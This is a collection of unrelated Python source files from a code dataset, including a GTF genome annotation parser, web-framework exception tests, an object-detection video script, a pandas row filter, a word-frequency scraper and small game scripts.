self.dtid2pos = defaultdict (list)
self.dgid2tid = defaultdict (list)
self.dgid2name = defaultdict (str)
self.dtid2gid = defaultdict (str)
self.dtid2type = defaultdict (str)
self.dchromstart2tid = defaultdict (str)
self.dchromend2tid = defaultdict (str)
self.dtid2startcodon = defaultdict (int)
self.dtid2startcodon_pos = defaultdict (list)
self.dtid2stopcodon = defaultdict (int)
self.dtid2coord = defaultdict (list)
self.gtf_file = gtf_file
if self.verbose > 0:
print (f"Reading gtf {gtf_file}...", file=sys.stderr)
with open(gtf_file, "r+b") as fgtf:
self.mm = mmap.mmap(fgtf.fileno(), 0, prot=mmap.PROT_READ)
iline = 0
no_transcript = True
for line in iter(self.mm.readline, b""):
iline += 1
# if iline % 10000 == 0:
# print (f"...line {iline}", file=sys.stderr)
if iline > head and head != -1:
break
                if line == b"":
                    break
columns = line.decode().strip().split ('\t')
if len (columns) < 8:
continue
chrom, feature, start, end, strand, info = columns[0], columns[2], int(columns[3]), int(columns[4]), columns[6], columns[8]
info_proc = self.get_exon_id (info)
                # byte offset of the current line (mmap read position minus the line length)
                pos = self.mm.tell() - len(line)
if info_proc["transcript_id"] == "":
self.dtid2pos[info_proc["gene_id"]].append (pos)
else:
self.dtid2pos[info_proc["transcript_id"]].append (pos)
if feature == "transcript":
no_transcript = False
self.dgid2tid[info_proc["gene_id"]].append (info_proc["transcript_id"])
self.dgid2tid[info_proc["gene_name"]].append (info_proc["transcript_id"])
self.dtid2gid[info_proc["transcript_id"]] = info_proc["gene_id"]
self.dgid2name[info_proc["gene_id"]] = info_proc["gene_name"]
self.dtid2type[info_proc["transcript_id"]] = info_proc["transcript_type"]
elif feature == "exon":
# if transcript feature not in gtf...
self.dtid2gid[info_proc["transcript_id"]] = info_proc["gene_id"]
self.dgid2name[info_proc["gene_id"]] = info_proc["gene_name"]
if no_transcript:
if not info_proc["transcript_id"] in self.dgid2tid[info_proc["gene_id"]]:
self.dgid2tid[info_proc["gene_id"]].append (info_proc["transcript_id"])
self.dchromstart2tid[(chrom,start)] += info_proc["transcript_id"] + ","
self.dchromend2tid[(chrom,end)] += info_proc["transcript_id"] + ","
self.nexon_lines += 1
self.dtid2coord[info_proc["transcript_id"]].append ((chrom, start, end, strand))
elif feature == "start_codon":
start_pos = start if strand == "+" else end
if info_proc["transcript_id"] in self.dtid2startcodon:
existing_pos = self.dtid2startcodon[info_proc["transcript_id"]]
if strand == "+":
start_pos = min (start_pos, existing_pos)
else:
start_pos = max (start_pos, existing_pos)
self.dtid2startcodon[info_proc["transcript_id"]] = start_pos
self.dtid2startcodon_pos[info_proc["transcript_id"]].append ((start, end))
elif feature == "stop_codon":
stop_pos = start if strand == "+" else end
if info_proc["transcript_id"] in self.dtid2stopcodon:
existing_pos = self.dtid2stopcodon[info_proc["transcript_id"]]
if strand == "+":
stop_pos = min (stop_pos, existing_pos)
else:
stop_pos = max (stop_pos, existing_pos)
self.dtid2stopcodon[info_proc["transcript_id"]] = stop_pos
if self.verbose > 0:
print (f"...found {self.nexon_lines} exons", file=sys.stderr)
def fetch (self, query, feature = "exon"):
q = query
if isinstance (query, str):
q = [query]
positions = {}
for qi in q:
positions[qi] = self.dtid2pos[qi]
# for qi in q:
# if qi in self.dgid2tid:
# for tid in self.dgid2tid[qi]:
# positions[tid] = self.dtid2pos[tid]
# else:
# positions[qi] = self.dtid2pos[qi]
return gtf2_info (self, positions, feature)
def get_exon_id (self, info):
r = {"gene_id": "", \
"transcript_id": "", \
"gene_name": "",
"transcript_type": ""}
for i in info.split ("; "):
j = i.strip (" ").split (" ")
if len(j) != 2:
continue
for n in r:
if n == j[0]:
r[n] = j[1].strip("\"")
break
return (r)
#def get_coordinates (self, tid):
# return (self.fetch (tid, "exon").get_coordinates ())
def get_name (self, tid):
gid = self.dtid2gid[tid]
return (self.dgid2name[gid])
def get_type (self, tid):
return (self.dtid2type[tid])
def get_gene_id (self, tid):
return (self.dtid2gid[tid])
def get_gid (self, tid):
return (self.dtid2gid[tid])
def get_startcodon (self, tid):
return self.dtid2startcodon[tid]
def get_startcodon_pos (self, tid):
return (sorted(self.dtid2startcodon_pos[tid],key=lambda x: x[1], reverse=False))
def get_stopcodon (self, tid):
return self.dtid2stopcodon[tid]
def get_tids_from_gid (self, gid):
if gid in self.dgid2tid:
return (self.dgid2tid[gid])
if gid in self.dtid2gid:
return [gid]
return []
def get_tids_from_start (self, chrom, start):
start = int(start)
if (chrom, start) in self.dchromstart2tid:
return [s for s in self.dchromstart2tid[(chrom, start)].split(",") if s != ""]
else:
return []
def get_tids_from_end (self, chrom, end):
end = int(end)
if (chrom, end) in self.dchromend2tid:
return [s for s in self.dchromend2tid[(chrom, end)].split(",") if s != ""]
else:
return []
def get_all_tids (self):
#for tid in self.dtid2pos:
#for tid in self.dtid2gid:
# if tid != None:
# yield (tid)
return [tid for tid in self.dtid2gid if tid != None]
def get_all_gids (self):
return [gid for gid in self.dgid2name if gid != None]
# for gid in self.dgid2name:
# if gid != None:
# yield (gid)
def get_exon_coords (self, tid):
return (sorted(self.dtid2coord[tid],key=lambda x: x[1], reverse=False))
def get_chrom (self, tid):
return ("|".join (list(set([c for (c,s,e,t) in self.dtid2coord[tid]]))))
def get_strand (self, tid):
return ("|".join (list(set([t for (c,s,e,t) in self.dtid2coord[tid]]))))
def get_nexons (self, tid):
return (len (self.get_exon_coords (tid)))
def get_exons (self, tid):
sorted_exons = self.get_exon_coords (tid)
return ([s for (c,s,e,t) in sorted_exons], [e for (c,s,e,t) in sorted_exons])
def get_introns (self, tid):
exons_s, exons_e = self.get_exons (tid)
return (exons_e[:-1], exons_s[1:])
def get_start (self, tid):
sorted_exons = self.get_exon_coords (tid)
return (min ([s for (c,s,e,t) in sorted_exons]))
def get_end (self, tid):
sorted_exons = self.get_exon_coords (tid)
return (max ([e for (c,s,e,t) in sorted_exons]))
def print (self, tid, feature):
self.fetch (tid, feature).print_feature (feature)
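

# Illustrative usage sketch (added for clarity; not part of the original ribofy module).
# The GTF path "annotation.gtf" and the number of transcripts printed are placeholder assumptions.
if __name__ == "__main__":
    gtf = gtf2("annotation.gtf", verbose=1)      # index the GTF by byte offsets
    for tid in gtf.get_all_tids()[:5]:           # look at the first few transcript ids
        print(tid, gtf.get_gene_id(tid), gtf.get_name(tid), gtf.get_chrom(tid),
              gtf.get_start(tid), gtf.get_end(tid), gtf.get_nexons(tid))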
| StarcoderdataPython |
3205589 | import json
import pytest
import six
from mock import Mock, patch
from nefertari import json_httpexceptions as jsonex
from nefertari.renderers import _JSONEncoder
class TestJSONHTTPExceptionsModule(object):
def test_includeme(self):
config = Mock()
jsonex.includeme(config)
config.add_view.assert_called_once_with(
view=jsonex.httperrors,
context=jsonex.http_exc.HTTPError)
@patch.object(jsonex, 'traceback')
def test_add_stack(self, mock_trace):
mock_trace.format_stack.return_value = ['foo', 'bar']
assert jsonex.add_stack() == 'foobar'
def test_create_json_response(self):
request = Mock(
url='http://example.com',
client_addr='127.0.0.1',
remote_addr='127.0.0.2')
obj = Mock(
status_int=401,
location='http://example.com/api')
obj2 = jsonex.create_json_response(
obj, request, encoder=_JSONEncoder,
status_code=402, explanation='success',
message='foo', title='bar')
assert obj2.content_type == 'application/json'
assert isinstance(obj2.body, six.binary_type)
body = json.loads(obj2.body.decode('utf-8'))
assert sorted(body.keys()) == [
'_pk', 'client_addr', 'explanation', 'message', 'remote_addr',
'request_url', 'status_code', 'timestamp', 'title'
]
assert body['remote_addr'] == '127.0.0.2'
assert body['client_addr'] == '127.0.0.1'
assert body['status_code'] == 402
assert body['explanation'] == 'success'
assert body['title'] == 'bar'
assert body['message'] == 'foo'
assert body['_pk'] == 'api'
assert body['request_url'] == 'http://example.com'
@patch.object(jsonex, 'add_stack')
def test_create_json_response_obj_properties(self, mock_stack):
mock_stack.return_value = 'foo'
obj = Mock(
status_int=401,
location='http://example.com/api',
status_code=402, explanation='success',
message='foo', title='bar')
obj2 = jsonex.create_json_response(
obj, None, encoder=_JSONEncoder)
body = json.loads(obj2.body.decode('utf-8'))
assert body['status_code'] == 402
assert body['explanation'] == 'success'
assert body['title'] == 'bar'
assert body['message'] == 'foo'
assert body['_pk'] == 'api'
@patch.object(jsonex, 'add_stack')
def test_create_json_response_stack_calls(self, mock_stack):
mock_stack.return_value = 'foo'
obj = Mock(status_int=401, location='http://example.com/api')
jsonex.create_json_response(obj, None, encoder=_JSONEncoder)
assert mock_stack.call_count == 0
obj = Mock(status_int=500, location='http://example.com/api')
jsonex.create_json_response(obj, None, encoder=_JSONEncoder)
mock_stack.assert_called_with()
assert mock_stack.call_count == 1
obj = Mock(status_int=401, location='http://example.com/api')
jsonex.create_json_response(
obj, None, encoder=_JSONEncoder, show_stack=True)
mock_stack.assert_called_with()
assert mock_stack.call_count == 2
obj = Mock(status_int=401, location='http://example.com/api')
jsonex.create_json_response(
obj, None, encoder=_JSONEncoder, log_it=True)
mock_stack.assert_called_with()
assert mock_stack.call_count == 3
def test_create_json_response_with_body(self):
obj = Mock(
status_int=401,
location='http://example.com/api')
obj2 = jsonex.create_json_response(
obj, None, encoder=_JSONEncoder,
status_code=402, explanation='success',
message='foo', title='bar', body={'zoo': 'zoo'})
assert obj2.content_type == 'application/json'
assert isinstance(obj2.body, six.binary_type)
body = json.loads(obj2.body.decode('utf-8'))
assert body == {'zoo': 'zoo'}
def test_exception_response(self):
jsonex.STATUS_MAP[12345] = lambda x: x + 3
assert jsonex.exception_response(12345, x=1) == 4
with pytest.raises(KeyError):
jsonex.exception_response(3123123123123123)
jsonex.STATUS_MAP.pop(12345, None)
def test_status_map(self):
codes = [
200, 201, 202, 203, 204, 205, 206,
300, 301, 302, 303, 304, 305, 307,
400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410,
411, 412, 413, 414, 415, 416, 417, 422, 423, 424,
500, 501, 502, 503, 504, 505, 507
]
for code in codes:
assert code in jsonex.STATUS_MAP
for code_exc in jsonex.STATUS_MAP.values():
assert hasattr(jsonex, code_exc.__name__)
@patch.object(jsonex, 'create_json_response')
def test_httperrors(self, mock_create):
jsonex.httperrors({'foo': 'bar'}, 1)
mock_create.assert_called_once_with({'foo': 'bar'}, request=1)
@patch.object(jsonex, 'create_json_response')
def test_jhttpcreated(self, mock_create):
resp = jsonex.JHTTPCreated(
resource={'foo': 'bar'},
location='http://example.com/1',
encoder=1)
mock_create.assert_called_once_with(
obj=resp, resource={'foo': 'bar', '_self': 'http://example.com/1'},
request=None, encoder=1, body=None)
| StarcoderdataPython |
184995 | <gh_stars>0
# -*- coding: utf-8 -*-
from os import path
import sys
import math
project_dir = path.dirname(__file__)
project_dir = path.join('..')
sys.path.append(project_dir)
from atores import PassaroAmarelo, PassaroVermelho, Obstaculo, Porco
from fase import Fase
from placa_grafica_tkinter import rodar_fase
from random import randint
if __name__ == '__main__':
fase = Fase(intervalo_de_colisao=32)
    # Add the yellow and red birds
for i in range(4):
fase.adicionar_passaro(PassaroAmarelo(30, 30))
fase.adicionar_passaro(PassaroVermelho(30, 30))
    # Obstacles
_obstaculos = [(300,0),(400,40),(500,80),(600,120),(700,160)]
for posicao_obstaculo in _obstaculos:
x, y = posicao_obstaculo
fase.adicionar_obstaculo(Obstaculo(x, y))
    # Pigs
_porcos = [(340,0),(440,0),(540,0),(640,0),(740,0)]
for posicao_porco in _porcos:
x, y = posicao_porco
fase.adicionar_porco(Porco(x, y))
rodar_fase(fase) | StarcoderdataPython |
1796558 | class config:
def get_database_conn_string(self) -> str:
pass
| StarcoderdataPython |
95481 | from mmdet.apis import init_detector, inference_detector, show_result
import time
import os
config_file = 'configs/htc/htc_x101_64x4d_fpn_20e_16gpu.py'
checkpoint_file = 'checkpoints/htc_x101_64x4d_fpn_20e_20190408-497f2561.pth'
folder_name = config_file.split('/')[2].split('.')[0]
print('FOLDER NAME ',folder_name)
if not os.path.exists(os.path.join(os.getcwd(), folder_name)):
os.mkdir(os.path.join(os.getcwd(), folder_name))
# build the model from a config file and a checkpoint file
# model = init_detector(config_file, checkpoint_file, device='cuda:0')
model = init_detector(config_file, checkpoint_file, device='cuda:0')
# test a single image and show the results
import cv2
import numpy as np
# Create a VideoCapture object and read from input file
cap = cv2.VideoCapture('video.mp4')
# Check if camera opened successfully pr
if (cap.isOpened()== False):
print("Error opening video file")
# Read until video is completed
count =0
start = time.time()
while(cap.isOpened()):
# Capture frame-by-frame
ret, frame = cap.read()
if ret == True:
# img = 'test.jpg' # or img = mmcv.imread(img), which will only load it once
result = inference_detector(model, frame)
show_result(frame, result, model.CLASSES, out_file='benchmarks/{}/result{}.jpg'.format(folder_name ,count))
count+=1
print('Count ',count, 'Time ',time.time() - start)
end = time.time() - start
cap.release()
cv2.destroyAllWindows()
print('_______', end)
# test a list of images and write the results to image files
# imgs = ['test1.jpg', 'test2.jpg']
# for i, result in enumerate(inference_detector(model, imgs)):
# show_result(imgs[i], result, model.CLASSES, out_file='result_{}.jpg'.format(i)) | StarcoderdataPython |
151611 | <reponame>zephenryus/botw-havok
import struct
from typing import BinaryIO
from .SectionHeader import SectionHeader
from .DataSectionOffsetTable import DataSectionOffsetTable
from .ClassNames import ClassNames
class Data(object):
def __init__(self,
infile: BinaryIO,
data_section_header: SectionHeader,
data_section_offset_table: DataSectionOffsetTable,
classnames
) -> None:
self.data = []
self.data_section_offset_table = self._get_array_sizes(infile, data_section_offset_table, data_section_header.start)
self._get_data(infile, data_section_header.start)
def __getitem__(self, item):
return self.data[item]
def _get_array_sizes(self, infile: BinaryIO,
data_section_offset_table: DataSectionOffsetTable,
section_start: int
) -> DataSectionOffsetTable:
for offset in data_section_offset_table:
infile.seek(offset.meta + section_start)
array_length, array_length_check = struct.unpack('>4x2I4x', infile.read(16))
if array_length_check == array_length + 0x80000000:
offset.array_length = array_length
else:
offset.array_length = 0
return data_section_offset_table
def _get_data(self, infile: BinaryIO, section_start: int):
for offset in self.data_section_offset_table:
infile.seek(offset.data + section_start)
self.data.append(struct.unpack('>I', infile.read(4))[0])
| StarcoderdataPython |
100294 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# TODO: add search phrases
#
import urllib
from bs4 import BeautifulSoup
from collections import Counter
import os
import re
maxAnalysisCount = 150
maxOutputCount = 100
outFileName = "CraftConfWordFreqTrend.csv"
commonWordsFileName = "CommonWords.csv"
def readList(input, separator=''):
retList = list()
with open(input, 'rb') as inputFile:
for line in inputFile:
outline = line.strip()
if outline != "" and not outline.startswith("#"):
if separator == '':
retList.append(outline)
else:
for item in outline.split(separator):
item = item.strip()
if item != "":
retList.append(item)
return retList
def writeHeader(outFileName):
try:
os.remove(outFileName)
except OSError:
pass
with open(outFileName, "a") as outfile:
outfile.write("{0}, {1}, {2}\n".format("Year", "Keyword", "Frequency"))
def parsePage(url, outFileName, prefix):
print "Processing URL: {0}, Result: {1}, Prefix: {2}".format(url, outFileName, prefix)
opener = urllib.urlopen(url)
page = opener.read()
opener.close()
soup = BeautifulSoup(page, "html.parser", from_encoding="UTF-8")
content = soup.find_all("li", "speakers-item")
text = ""
for entry in content:
text += entry.get_text(" ", True)
words = [word.lower() for word in text.split()]
c = Counter(words)
for key in commonWords:
if key in c:
del c[key]
mostCommon = list()
for word, count in c.most_common(maxAnalysisCount):
if not re.search('[–{@#!;+=_,$<(^)>?.:%/&}''"''-]', word):
if not (re.search(u'\u2014', word) or re.search(u'\u2013', word)):
if not re.search('[0-9]', word):
if word:
mostCommon.append((word, count))
else:
print("Skipping: <empty>")
else:
print("Skipping number: {0}".decode('ascii', 'ignore').format(word))
else:
print("Skipping unicode character: {0}".decode('ascii', 'ignore').format(word))
else:
print("Skipping special character: {0}".decode('ascii', 'ignore').format(word))
with open(outFileName, "a") as outfile:
for word, count in mostCommon[:maxOutputCount]:
outfile.write("{0}, {1}, {2}\n".format(prefix, word, count))
print "Done"
# main
commonWords = readList(commonWordsFileName, ',')
writeHeader(outFileName)
parsePage("https://web.archive.org/web/20160325231108/http://craft-conf.com/2016", outFileName, "year2016")
parsePage("https://web.archive.org/web/20160406212403/http://craft-conf.com/2015", outFileName, "year2015")
parsePage("https://web.archive.org/web/20160324192950/http://craft-conf.com/2014", outFileName, "year2014")
| StarcoderdataPython |
141424 | <reponame>kashy750/RecoSystem
#!/usr/bin/env python
from py_recommendation.constants import STOPWORDS
from re import sub
class Utils(object):
"""Helper class for main api classes"""
@staticmethod
def cleanText(text_list):
return [" ".join(sub(r"(?!(?<=\d)\.(?=\d))[^a-zA-Z0-9 ]"," ",each).lower().split()) for each in text_list]
| StarcoderdataPython |
38066 | a=int(input())
b=int(input())
print (a/b)
a=float(a)
b=float(b)
print (a/b) | StarcoderdataPython |
36590 | from datetime import datetime, timedelta
import pytest
from django.test import TestCase
from tests.models import Org, Sub, Widget
data_org = {"name": "Acme Widgets"}
class FieldTestCase(TestCase):
def setUp(self):
self.org = Org.objects.create(**data_org)
self.created = datetime.now()
self.one_sec = timedelta(seconds=1)
pass
# org = Org.objects.create(**data_org)
def test_obj_creation(self):
assert self.one_sec > self.created - self.org.created
assert self.one_sec > self.created - self.org.updated
def test_updated(self):
self.org.name = "Updated"
self.org.save()
now = datetime.now()
assert self.one_sec > self.created - self.org.created
assert self.one_sec > now - self.org.updated
| StarcoderdataPython |
147301 | import argparse
import glob
import os
import pickle
import sys
import time
from itertools import product
import matplotlib.pyplot as plt
import multiprocessing as mp
import numpy as np
import pandas as pd
import seaborn as sns
import statsmodels.nonparametric.api as smnp
import swifter
import utils
import graphs
N_PROC = 10
BASE_DIR = '/home/johnmcbride/projects/Scales/Data_compare/'
RAW_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Raw/'
PRO_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Processed/'
REAL_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Samples')
DIST_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Sample_dist')
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
pass
else:
RE += pk[i] * np.log(pk[i] / qk[i])
return RE
def calc_jensen_shannon_distance(pk, qk):
mk = 0.5 * (pk + qk)
return (0.5 * (calc_relative_entropy(pk, mk) + calc_relative_entropy(qk, mk))) ** 0.5
def smooth_dist_kde(df, cat='pair_ints', hist=False, nbins=1202):
X = [float(x) for y in df.loc[:,cat] for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit(kernel='gau', bw='scott', fft=1, gridsize=10000, cut=20)
grid = np.linspace(0, 1200, num=nbins-1)
y = np.array([kde.evaluate(x) for x in grid]).reshape(nbins-1)
if hist:
xtra = (nbins-2)/1200./2.
bins = np.linspace(-xtra, 1200+xtra, num=nbins)
        hist, bins = np.histogram(X, bins=bins, density=True)
return grid, y, hist
else:
return grid, y
def get_KDE(df, cat):
xKDE, yKDE = smooth_dist_kde(df, cat=cat)
return yKDE / np.trapz(yKDE)
def get_dists_file(s, cat='pair_ints', nbins=1202):
out = {}
if not os.path.exists(os.path.join(DIST_DIR, f"{s}_n7_hist.npy")):
df = pd.read_feather(os.path.join(REAL_DIR, f"{s}.feather"))
for n in [5,7]:
fHist = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_hist.npy")
fKDE = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_kde.npy")
if os.path.exists(fHist):
X, hist = np.load(fHist)
X, kde = np.load(fKDE)
else:
X, kde, hist = smooth_dist_kde(df.loc[df.n_notes==n], cat=cat, hist=True, nbins=nbins)
np.save(fHist, np.array([X, hist]))
np.save(fKDE, np.array([X, kde]))
out[n] = [X, kde, hist]
return out
def how_much_real_scales_predicted(df, n_real, w, s):
# try:
return float(len(set([int(x) for y in df[f"{s}_w{w:02d}"] for x in y.split(';') if len(y)]))) / float(n_real)
# except:
# return None
def rename_processed_files(f, s='sample_'):
root, fName = os.path.split(f)
print(root, fName)
return os.path.join(root, f"{s}{fName}")
def load_model_filenames():
paths = pickle.load(open(os.path.join(BASE_DIR, 'best_models.pickle'), 'rb'))
return [rename_processed_files(paths[k][n]) for k, n in product(paths.keys(), [5,7])]
def calculate_metrics(y1, y2):
y1 = y1.reshape(y1.size)
y2 = y2.reshape(y2.size)
err_sq = np.sqrt(np.dot(y1-y2, y1-y2))
d1 = y1[1:] - y1[:-1]
d2 = y2[1:] - y2[:-1]
deriv_es = np.sqrt(np.dot(d1-d2, d1-d2))
return [err_sq, deriv_es, (err_sq * deriv_es)**0.5]
def scale_rsq(Y1, Y2):
SStot = np.sum((Y1 - np.mean(Y1))**2)
SSres = np.sum((Y1 - Y2)**2)
return 1 - SSres/SStot
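
# Worked toy example for the two metric helpers above (added for clarity; the values are
# illustrative only and are not used by the pipeline below):
#   >>> y = np.linspace(0, 1, 100)
#   >>> calculate_metrics(y, y)      # identical curves -> [0.0, 0.0, 0.0]
#   >>> scale_rsq(y, y)              # perfect agreement -> R^2 of 1.0
#   >>> scale_rsq(y, y + 0.1)        # a constant offset lowers R^2 below 1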
if __name__ == "__main__":
timeS = time.time()
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--partabase', action='store', default='None', type=str)
args = parser.parse_args()
categories = ['pair_ints', 'scale']
n_arr = np.arange(4,10,dtype=int)
samples = ['theory', 'instrument'] + [f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]
files = [f"{s}.feather" for s in samples]
int_dists = [get_dists_file(s) for s in samples]
hist_dists = [get_dists_file(s, cat='scale', nbins=42) for s in samples]
# print(f"Real scales loaded after {(time.time()-timeS)/60.} minutes")
pro_files = load_model_filenames()
def extract_stats_each_model(fName):
df = pd.read_feather(fName)
bits = os.path.split(fName)[1].split('_')
n = int(bits[1].strip('n'))
idx = [i for i in range(len(bits)) if bits[i][0]=='M'][0]
bias = '_'.join(bits[2:idx])
mi = int(bits[idx].strip('MI'))
ma = int(bits[idx+1].strip('MA'))
beta = float(bits[-1].strip('.feather'))
n_sample = df.n_att.sum()
q = float(len(df))/float(n_sample)
output = [n, mi, ma, bias, beta, q, n_sample]
X, iKDE, iHist = smooth_dist_kde(df, cat='pair_ints', hist=True)
X, sKDE, sHist = smooth_dist_kde(df, cat='scale', hist=True, nbins=42)
for i, f in enumerate(files):
df_real = pd.read_feather(os.path.join(REAL_DIR, f))
n_real = len(df_real.loc[df_real.n_notes==n])
frac_real = [how_much_real_scales_predicted(df, n_real, w, f'{samples[i]}_ss') for w in [10, 20]]
metrics = calculate_metrics(int_dists[i][n][1], iKDE)
scale_R2 = scale_rsq(sHist,hist_dists[i][n][2])
output.extend([n_real] + frac_real + metrics + [scale_R2])
return output + [fName]
biases = ['none',
'distI_1_0', 'distI_2_0', 'distI_3_0', 'distI_0_1', 'distI_0_2',
'distI_1_1', 'distI_2_1', 'distI_1_2', 'distI_2_2',
'opt_c', 'opt_c_I1', 'opt_c_I2', 'opt_c_s2', 'opt_c_s3'] + \
[f"hs_n{i}_w{w:02d}" for i in range(1,4) for w in [5,10,15,20]] + \
[f"hs_r3_w{w:02d}" for w in [5,10,15,20]] + \
[f"ahs{i:02d}_w{w:02d}" for i in range(1,11) for w in [5,10,15,20]] + \
[f"im5_r{r:3.1f}_w{w:02d}" for r in [0, 0.5, 1, 2] for w in [5,10,15,20]] + \
[f"Nhs_n1_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n2_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n3_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nim5_r0.0_w{w:02d}" for w in [5,10,15,20]] + \
[f"TRANSB_{i}" for i in [1,2,3]] + \
[f"TRANS{a}_{b}" for a in ['A', 'B'] for b in range(1,4)] + \
[f"HAR_{b}_{a}" for a in range(1,4) for b in range(5,25,5)] + \
[f"{a}_{b}" for a in ['HAR', 'FIF'] for b in range(5,25,5)]
# ['hs_r3_w05', 'hs_r3_w10', 'hs_r3_w15', 'hs_r3_w20'] + \
# [f"im5_r0.75_w{w:02d}" for w in [5,10,15,20] +
groups = ['none'] + ['distI']*3 + ['S#1']*2 + ['distI_S#1']*4 + \
['distW'] + ['distW_S#1']*2 + ['distW_S#2']*2 + ['HS']*12 + ['im5']*4 + ['AHS']*40 + ['im5']*16 + \
['HS']*12 + ['im5']*4 + ['TRANSB']*3 + \
['TRANS']*6 + ['HAR']*4 + ['HAR2']*4 + ['HAR3']*4 + ['HAR']*4 + ['FIF']*4
bias_groups = {biases[i]:groups[i] for i in range(len(biases))}
with mp.Pool(N_PROC) as pool:
results = list(pool.imap_unordered(extract_stats_each_model, pro_files))
print(f"Model comparison finished after {(time.time()-timeS)/60.} minutes")
df = pd.DataFrame(columns=['n_notes', 'min_int', 'max_int', 'bias', 'beta', 'quantile', 'n_sample'] + \
[f"{s}_{a}" for s in samples for a in ['n_real', 'fr_10', 'fr_20', 'RMSD', 'dRMSD', 'met1', 'sRMSD']] + \
['fName'], data=results)
df['bias_group'] = df.bias.apply(lambda x: bias_groups[x])
df['logq'] = np.log10(df['quantile'])
df = graphs.rename_bias_groups(df)
df = graphs.rename_biases(df)
print(f"DataFrame compiled after {(time.time()-timeS)/60.} minutes")
if args.partabase == 'None':
df.to_feather(os.path.join(BASE_DIR, 'Processed', 'database_sensitivity.feather'))
| StarcoderdataPython |
3282613 | import torch
import torch.nn as nn
from graphs.losses.softmax import LossFunction as Softmax
from graphs.losses.angleproto import LossFunction as Angleproto
class LossFunction(nn.Module):
def __init__(self, **kwargs):
super(LossFunction, self).__init__()
self.test_normalize = True
self.softmax = Softmax(**kwargs)
self.angleproto = Angleproto(**kwargs)
def forward(self, x, label=None):
assert x.size()[1] == 2
nlossS, prec1 = self.softmax(x.reshape(-1,x.size()[-1]), label.repeat_interleave(2))
nlossP, _ = self.angleproto(x,None)
return nlossS+nlossP, prec1
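
# Rough usage sketch (added for illustration; constructor kwargs and tensor shapes are
# assumptions inferred from the assert above, not taken from this repository):
#   criterion = LossFunction(nOut=512, nClasses=100)   # kwargs are forwarded to both sub-losses
#   x = torch.randn(8, 2, 512)                         # (speakers, 2 utterances each, embedding dim)
#   label = torch.randint(0, 100, (8,))
#   loss, prec1 = criterion(x, label)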
| StarcoderdataPython |
3380340 | <gh_stars>10-100
"""Transform data by filtering in data using filtering operations
Author(s):
<NAME> (<EMAIL>)
<NAME> (<EMAIL>)
"""
import operator
import logging
import numpy as np
import pandas as pd
from primrose.base.transformer import AbstractTransformer
class FilterByPandasExpression(AbstractTransformer):
"""Applies filters to data as defined in feature_filters"""
def __init__(self, feature_filters):
"""initialize filter with a list of feature_filters"""
self.feature_filters = feature_filters
def fit(self, data):
"""fit data, here just passing
Args:
data (object): some data
"""
pass
def transform(self, data):
"""Applies filters to data as defined in feature_filters. This is neccessary so we can filter rows in one reader
based on information from another, and therefore has to be applied after the combiner step.
The filters can operate on a single column with a fixed set of operations and a static value:
fixed operations: `==`, `!=`, `<>`, `<`, `<=`, `>`, `>=`
The feature_filters object should be structured as a list of lists:
feature_filters: `[[column, operation, static value], [column, operation, static value]]`
example: `[["number_of_members", "<", 1000]]` for filtering all rows with number_of_members less than 1000
Args:
            data (pandas.DataFrame): dataframe to filter; the filter definitions come from
                the feature_filters list passed to the constructor
Returns:
dataframe with filtered data
Raises:
Exception if not a pandas dataframe, operation not supported, or column name not recognized
"""
if not isinstance(data, pd.DataFrame):
raise Exception("Data is not a pandas DataFrame")
ops = {
"==": operator.eq,
"!=": operator.ne,
"<>": operator.ne,
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
}
if len(self.feature_filters) == 0:
logging.info("no filters found; returning combined_data as filtered_data")
return data
else:
filters = []
for col, op, val in self.feature_filters:
if not col in data.columns:
raise Exception("Unrecognized filter column '" + str(col) + "'")
if str(op) not in ops:
raise Exception("Unsupported filter operation '" + str(op) + "'")
filters.append(ops[op](data[col], val))
filtered_data = data[np.all(filters, axis=0)]
filtered_data = filtered_data.reset_index(drop=True)
logging.info("Filtered out %d rows" % (len(data) - len(filtered_data)))
return filtered_data
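

# Illustrative self-test (added for clarity; not part of primrose). Column names and
# values below are invented purely to demonstrate the feature_filters layout.
if __name__ == "__main__":
    demo = pd.DataFrame({"number_of_members": [10, 5000, 800], "state": ["IA", "NY", "IA"]})
    demo_filter = FilterByPandasExpression([["number_of_members", "<", 1000], ["state", "==", "IA"]])
    print(demo_filter.transform(demo))  # keeps only rows matching all filters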
| StarcoderdataPython |
1783614 | from UserString import MutableString
import pygame
import sys
import time
pygame.init()
WHITE = (48, 48, 48)
manx = 0
many = 0
pixelx = 60
pixely = 60
tilex = 10
tiley = 8
displayx = pixelx * tilex
displayy = pixely * tiley
iotcount = 0
DISPLAYSURF = None
iotwall = pygame.image.load('iot_wall.png')
iotmanU = pygame.image.load('iot_manU.png')
iotmanD = pygame.image.load('iot_manD.png')
iotmanL = pygame.image.load('iot_manL.png')
iotmanR = pygame.image.load('iot_manR.png')
iotobj1 = pygame.image.load('iot_obj1.png')
iotobj2 = pygame.image.load('iot_obj2.png')
clear = pygame.image.load('iot_clear.png')
iotman = iotmanL
stagenum = 0
iotmap = []
iotstage = [
[
MutableString(" "),
MutableString(" ### "),
MutableString(" ###2## "),
MutableString(" #211 ### "),
MutableString(" ###@112# "),
MutableString(" ##2### "),
MutableString(" ### "),
MutableString(" ")],
[
MutableString(" ### "),
MutableString(" #2# "),
MutableString(" # #### "),
MutableString(" ###1 12# "),
MutableString(" #2 1@### "),
MutableString(" ####1# "),
MutableString(" #2# "),
MutableString(" ### ")],
[
MutableString("##########"),
MutableString("#2# 122#"),
MutableString("#21 ###1##"),
MutableString("#1# #"),
MutableString("# @ #1#"),
MutableString("##1### 12#"),
MutableString("#221 #2#"),
MutableString("##########")
]
]
def iotloadmap():
